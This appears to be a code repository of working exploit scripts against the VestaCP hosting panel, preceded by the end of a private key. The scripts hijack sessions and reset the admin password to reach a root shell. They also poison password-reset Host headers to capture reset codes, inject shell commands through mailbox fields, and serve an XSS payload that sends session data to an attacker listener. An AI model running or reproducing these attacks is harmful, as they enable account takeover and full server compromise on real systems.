11 | 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
51 | Cx767JjnhdbxRydw4rqjymnFftcllmQ=
52 | -----END PRIVATE KEY-----
53 | 


--------------------------------------------------------------------------------
/VestaCP/requirements.txt:
--------------------------------------------------------------------------------
1 | flask
2 | flask_cors


--------------------------------------------------------------------------------
/VestaCP/vestaATO.py:
--------------------------------------------------------------------------------
 1 | from VestaFuncs import *
 2 | import sys
 3 | import time
 4 | 
 5 | period = 0.5
 6 | 
 7 | if len(sys.argv) == 4:
 8 | 	targetHost = sys.argv[1]
 9 | 	targetUser = sys.argv[2]
10 | 	targetPass = sys.argv[3]
11 | else:
12 | 	print("Usage\npython3 vestaATO.py https://target_host:8083 user_login user_pass")
13 | 	exit()
14 | 
15 | 
16 | 
17 | ipFromHostname = getIPfromHostname(targetHost)
18 | 
19 | pwnDomain      = get_random_string().lower()+'.poc'
20 | pwnDomainAdmin = get_random_string().lower()+'.poc'
21 | 
22 | while True:
23 | 	## init user session
24 | 	uus = requests.Session()
25 | 
26 | 	## Login
27 | 	if login(uus,targetHost,targetUser,targetPass):
28 | 		
29 | 		usID  = uus.cookies.get_dict()['PHPSESSID']
30 | 
31 | 		## Check own webshell
32 | 		if getWebshell(uus,targetHost,pwnDomain,targetUser,ipFromHostname):
33 | 
34 | 			## Get other sessions IDs
35 | 			oSessIDs = getSessIDs(uus,targetHost,usID)
36 | 			if oSessIDs:
37 | 				print('[+] Obtained Sessions list : '+str(len(oSessIDs)))
38 | 
39 | 				## Check other sessions IDs
40 | 				adminSession = checkSessions(uus,targetHost,ipFromHostname,oSessIDs,pwnDomain)
41 | 
42 | 				## Admin session found
43 | 				if(adminSession):
44 | 					adminJSON = json.loads(adminSession[1])
45 | 
46 | 					## Reset key found
47 | 					if adminJSON['data']['RKEY']:
48 | 
49 | 						## Change admin password
50 | 						print('[+] admin RKEY '+adminJSON['data']['RKEY'])
51 | 						newAdminPassword = resetPassword('admin',targetHost, adminJSON['data']['RKEY'])
52 | 						if(newAdminPassword):
53 | 							print('[+] New admin account password ' +newAdminPassword)
54 | 
55 | 							## Login as admin
56 | 							uus2 = requests.Session()
57 | 							if login(uus2,targetHost,'admin',newAdminPassword):
58 | 
59 | 								## Check own webshell
60 | 								uWebshell = getWebshell(uus2,targetHost,pwnDomainAdmin,'admin',ipFromHostname)
61 | 								logout(uus2,targetHost)
62 | 								if 'admin' in queryWebshell('echo `whoami` ;',ipFromHostname,pwnDomainAdmin):
63 | 									queryWebshell('`mkdir -p ./func;echo "bash -c \\"\\\\$1\\"\nexit" > ./func/main.sh;` ;',ipFromHostname,pwnDomainAdmin)
64 | 									while True:
65 | 										print(queryWebshell('echo `VESTA=$(pwd) sudo /usr/local/vesta/bin/v-list-backup-host "'+input('# ').replace('"','\\"')+'"`;',ipFromHostname,pwnDomainAdmin))
66 | 
67 | 								else:
68 | 									print('[!] Admin webshell not found ??')
69 | 
70 | 						else:
71 | 							print('[!] admin password reset failed')
72 | 					else:
73 | 						print('[!] RKEY not found??')
74 | 			else:
75 | 				print('[!] no admin session found, restarting ..')
76 | 
77 | 		## Logout
78 | 		logout(uus,targetHost)
79 | 		time.sleep(period)


--------------------------------------------------------------------------------
/VestaCP/vestaEMAIL.py:
--------------------------------------------------------------------------------
 1 | from flask import Flask,request
 2 | from VestaFuncs import *
 3 | import os
 4 | import sys
 5 | 
 6 | 
 7 | if len(sys.argv) == 5:
 8 | 	targetHost   = sys.argv[1]
 9 | 	listenerPort = sys.argv[3]
10 | 	listenerHost = sys.argv[2]+':'+str(listenerPort)
11 | 	targetUser   = sys.argv[4]
12 | else:
13 | 	print("Usage\npython3 vestaEMAIL.py https://target_host:8083 https://listener_host listener_Port target_username")
14 | 	exit()
15 | 
16 | 
17 | app = Flask(__name__)
18 | 
19 | @app.route("/")
20 | def helloWorld():
21 | 	return "Hello"
22 | 
23 | 
24 | @app.route("/reset/", methods=['GET', 'POST'])
25 | def listener():
26 | 	action = request.args.get('action')
27 | 	user   = request.args.get('user')
28 | 	code   = request.args.get('code')
29 | 	if action == 'confirm':
30 | 		print('[+] Account obtained '+user)
31 | 		print('[+] RKEY obtained '+code)
32 | 		newUserPassword = resetPassword(user,targetHost, code)
33 | 		if(newUserPassword):
34 | 			print('[+] New '+user+' account password :' +newUserPassword)
35 | 			os.system('python3 vestaROOT.py '+targetHost+ ' ' + user + ' '+newUserPassword)
36 | 	return 'OK'
37 | 
38 | if __name__ == '__main__':
39 | 	#os.system("openssl req -x509 -newkey rsa:4096 -nodes -out cert.pem -keyout key.pem -days 365")
40 | 	us = requests.Session()
41 | 	r = us.get(targetHost + '/api/v1/login/index.php', verify=False,headers={'Host':listenerHost.replace('http://','').replace('https://','')})
42 | 	r2 = us.post(targetHost + '/api/v1/reset/index.php',verify=False, data={'user':targetUser}, headers={'Host':listenerHost.replace('http://','').replace('https://','')} )
43 | 	if r2.status_code == 200:
44 | 		print('[+] Reset requested for '+targetUser+' ...')
45 | 		app.run(debug=False, port=listenerPort, host='0.0.0.0', ssl_context=("cert.pem", "key.pem"))
46 | 	else:
47 | 		print('[!] Reset request failed ..')
48 | 		exit()
49 | 


--------------------------------------------------------------------------------
/VestaCP/vestaROOT.py:
--------------------------------------------------------------------------------
 1 | from VestaFuncs import *
 2 | import sys
 3 | 
 4 | 
 5 | if len(sys.argv) == 4:
 6 | 	targetHost = sys.argv[1]
 7 | 	targetUser = sys.argv[2]
 8 | 	targetPass = sys.argv[3]
 9 | else:
10 | 	print("Usage\npython3 vestaROOT.py https://target_host:8083 user_login user_pass")
11 | 	exit()
12 | 
13 | 
14 | ipFromHostname = getIPfromHostname(targetHost)
15 | pwnDomain      = get_random_string().lower()+'.poc'
16 | 
17 | ## init user session
18 | uus = requests.Session()
19 | 
20 | ## Login
21 | if login(uus,targetHost,targetUser,targetPass):
22 | 	
23 | 	## Check own webshell
24 | 	if getWebshell(uus,targetHost,pwnDomain,targetUser,ipFromHostname):
25 | 
26 | 		## Check, delete and create mailbox on pwnDomain
27 | 		mailBox = createMailBox(uus,targetHost,pwnDomain,True)
28 | 		if(mailBox):
29 | 			eMailBox = editMailBox(uus,targetHost,pwnDomain,mailBox['account'],'testPayload')
30 | 			if(eMailBox):
31 | 				## Deploy backdoor
32 | 				if editMailBox(uus,targetHost,pwnDomain,mailBox['account'],"';bash</home/"+targetUser+"/web/"+pwnDomain+"/public_html/iamroot/cmdtoexec>/home/"+targetUser+"/web/"+pwnDomain+"/public_html/iamroot/cmdresult;A='"):
33 | 					print('[+] root shell possibly obtained')
34 | 					while True:
35 | 						ucmd = input('# ')
36 | 						deploycommand(ucmd,ipFromHostname,pwnDomain)
37 | 						editMailBox(uus,targetHost,pwnDomain,mailBox['account'],"foobar",False)
38 | 						print(queryWebshell('echo `cat ./iamroot/cmdresult;`;',ipFromHostname,pwnDomain))
39 | 
40 | 		## Logout
41 | 		logout(uus,targetHost)
42 | 		print('[+] Logged out')
43 | 


--------------------------------------------------------------------------------
/VestaCP/vestaXSS.py:
--------------------------------------------------------------------------------
 1 | from flask import Flask,request
 2 | from flask_cors import CORS, cross_origin
 3 | from VestaFuncs import *
 4 | import os
 5 | import sys
 6 | 
 7 | 
 8 | if len(sys.argv) == 4:
 9 | 	targetHost   = sys.argv[1]
10 | 	listenerPort = sys.argv[3]
11 | 	listenerHost = sys.argv[2]+':'+str(listenerPort)
12 | else:
13 | 	print("Usage\npython3 vestaXSS.py https://target_host:8083 https://listener_host listener_Port")
14 | 	exit()
15 | 
16 | ## New self signed SSL cert
17 | #os.system("openssl req -x509 -newkey rsa:4096 -nodes -out cert.pem -keyout key.pem -days 365")
18 | 
19 | app = Flask(__name__)
20 | cors = CORS(app)
21 | app.config['CORS_HEADERS'] = 'Content-Type'
22 | 
23 | @app.route("/")
24 | def helloWorld():
25 | 	return "Hello"
26 | 
27 | 
28 | @app.route("/exploit.html")
29 | def exploit():
30 | 	JSsploit = '''fetch("/api/v1/login/session.php",{}).then(function (response) {
31 |        return response.json();
32 | }).then(function (ajson) {
33 | 	fetch("'''+listenerHost+'''/listener", {
34 | 	    method: 'POST',
35 | 	    headers: {
36 | 	      'Accept': 'application/json',
37 | 	      'Content-Type': 'application/json'
38 | 	    },
39 | 	    body: JSON.stringify(ajson)
40 |   	});
41 | });
42 | '''
43 | 	return '<script>document.location="'+targetHost+'/api/v1/edit/web/index.php?domain=%3Csvg%20onload=eval(atob(location.hash.slice(1)))%3E#'+b64en(JSsploit)+'"</script>'
44 | 
45 | @app.route("/listener", methods=['GET', 'POST'])
46 | @cross_origin()
47 | def listener():
48 | 	payload = request.json
49 | 	if payload['data']['HOME']:
50 | 		tUser = payload['user']
51 | 		print('[+] New request received :'+tUser)
52 | 		if payload['data']['HOME'] == '/home/admin':
53 | 			print('[+] Admin account found')
54 | 
55 | 		if payload['data']['RKEY']:
56 | 			print('[+] RKEY Found '+payload['data']['RKEY']+'\n[+] Reseting password for '+tUser)
57 | 			newUserPassword = resetPassword(tUser,targetHost, payload['data']['RKEY'])
58 | 			if(newUserPassword):
59 | 				print('[+] New '+tUser+' account password :' +newUserPassword)
60 | 				os.system('python3 vestaROOT.py '+targetHost+ ' ' + tUser + ' '+newUserPassword)
61 | 	return (payload)
62 | 
63 | 
64 | if __name__ == '__main__':
65 | 	print('[!] Send this link to your target : '+listenerHost+'/exploit.html')
66 | 	app.run(debug=False, port=listenerPort, host='0.0.0.0', ssl_context=("cert.pem", "key.pem"))
67 | 


--------------------------------------------------------------------------------
/VestaCP/videos/vestaATO.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rekter0/exploits/f793bb7715b336548624fed971782aa4ee5fd903/VestaCP/videos/vestaATO.mp4


--------------------------------------------------------------------------------
/VestaCP/videos/vestaEMAIL.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rekter0/exploits/f793bb7715b336548624fed971782aa4ee5fd903/VestaCP/videos/vestaEMAIL.mp4


--------------------------------------------------------------------------------
/VestaCP/videos/vestaROOT.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rekter0/exploits/f793bb7715b336548624fed971782aa4ee5fd903/VestaCP/videos/vestaROOT.mp4


--------------------------------------------------------------------------------
/VestaCP/videos/vestaXSS.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rekter0/exploits/f793bb7715b336548624fed971782aa4ee5fd903/VestaCP/videos/vestaXSS.mp4


--------------------------------------------------------------------------------